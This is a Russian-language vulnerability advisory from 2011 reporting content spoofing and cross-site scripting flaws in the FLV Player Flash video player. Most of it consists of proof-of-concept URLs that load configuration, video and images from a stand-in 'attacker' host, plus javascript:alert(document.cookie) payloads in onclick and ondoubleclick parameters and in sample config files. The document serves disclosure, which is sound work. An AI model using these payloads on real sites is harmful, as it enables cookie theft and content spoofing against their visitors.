Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:26894
HistoryAug 24, 2011 - 12:00 a.m.

Уязвимости в FLV Player

2011-08-2400:00:00
vulners.com
199

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною Content Spoofing и Cross-Site Scripting уязвимостях в флеш видео плеере FLV Player.

Content Spoofing (WASC-12):

Флешки плеера FLV Player принимают произвольные адреса в параметре configxml, что позволяет подделать содержимое флешки - например, указав адрес с файлом конфигурации с другого сайта.

http://site/player_flv.swf?configxml=http://attacker/1.xml
http://site/player_flv_maxi.swf?configxml=http://attacker/1.xml
http://site/player_flv_multi.swf?configxml=http://attacker/1.xml

Флешки плеера FLV Player принимают произвольные адреса в параметре config, что позволяет подделать содержимое флешки - например, указав адрес с файлом конфигурации с другого сайта.

http://site/player_flv.swf?config=http://attacker/1.txt
http://site/player_flv_maxi.swf?config=http://attacker/1.txt
http://site/player_flv_multi.swf?config=http://attacker/1.txt

Флешки плеера FLV Player позволяют подделать все важные параметры, в том числе flv и startimage, и при этом принимают произвольные адреса в параметрах flv и startimage, что позволяет подделать содержимое флешки - например, указав адреса видео и изображения с другого сайта. А для указания ссылки на произвольный сайт можно использовать параметры onclick и ondoubleclick.

http://site/player_flv.swf?flv=http://attacker/1.flv&startimage=http://attacker/1.jpg
http://site/player_flv_maxi.swf?flv=http://attacker/1.flv&startimage=http://attacker/1.jpg
http://site/player_flv_multi.swf?flv=http://attacker/1.flv&startimage=http://attacker/1.jpg
http://site/player_flv_mini.swf?flv=http://attacker/1.flv

XSS (WASC-08):

http://site/player_flv_maxi.swf?onclick=javascript:alert(document.cookie)
http://site/player_flv_multi.swf?onclick=javascript:alert(document.cookie)

http://site/player_flv_maxi.swf?ondoubleclick=javascript:alert(documentcookie)
http://site/player_flv_multi.swf?ondoubleclick=javascript:alert(document.cookie)

http://site/player_flv_maxi.swf?configxml=http://attacker/xss.xml
http://site/player_flv_multi.swf?configxml=http://attacker/xss.xml

Файл xss.xml:

<?xml version="1.0" encoding="UTF-8"?>
<config>
<param name="onclick" value="javascript:alert(document.cookie)" />
<param name="ondoubleclick" value="javascript:alert(document.cookie)" />
</config>

http://site/player_flv_maxi.swf?config=http://attacker/xss.txt
http://site/player_flv_multi.swf?config=http://attacker/xss.txt

Файл xss.txt:

onclick=javascript:alert(document.cookie)
ondoubleclick=javascript:alert(document.cookie)

Уязвимы версии MINI, NORMAL, MAXI и MULTI плеера. Замечу, что версия NORMAL встречается под именами player_flv.swf и player_flv_classic.swf.

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/5098/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua